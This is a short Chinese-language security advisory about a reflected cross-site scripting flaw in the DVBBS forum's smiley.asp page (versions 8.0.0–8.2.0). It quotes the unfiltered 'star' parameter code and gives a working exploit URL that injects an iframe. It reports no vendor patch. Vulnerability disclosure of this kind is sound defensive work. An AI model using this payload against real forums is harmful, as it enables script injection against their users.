动网论坛(DVBBS)Smiley.asp页面过滤不严导致跨站漏洞

动网论坛(DVBBS)Smiley.asp页面过滤不严导致跨站漏洞 影响版本:
DVBBS 8.0.0-8.2.0

程序介绍: 
动网论坛做为动网主要服务产品之一，自2001年投入推广并运营以来，得到了国内外广大互联网用户的广泛好评和支持。做为国内第一的互联网论坛服务品牌，占据了国内论坛服务市场的70％以上的用户，动网论坛服务在一些如电影、下载、网游等热门网站的占有率甚至高达80％以上，是中国论坛服务领域事实上的标准。

漏洞分析: 


文件smiley.asp中： 
If Request("star")<>"" Then //第13行 
star=Request("star") 
…… 
Response.Write "var star="&star&"; //第87行 
程序没有对输出变量star过滤导致xss漏洞的产生。 


漏洞利用: 
http://www.target.com/smiley.asp?star=xxx’);//-->%3C/script%3E<iframe%20src=http://www.baidu.com></iframe>

解决方案:
厂商补丁
DVBBS
----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.dvbbs.net

信息来源:
<*来源: Bug.Center.Team http://www.cnbct.org
链接: http://wavdb.com/vuln/1443
*>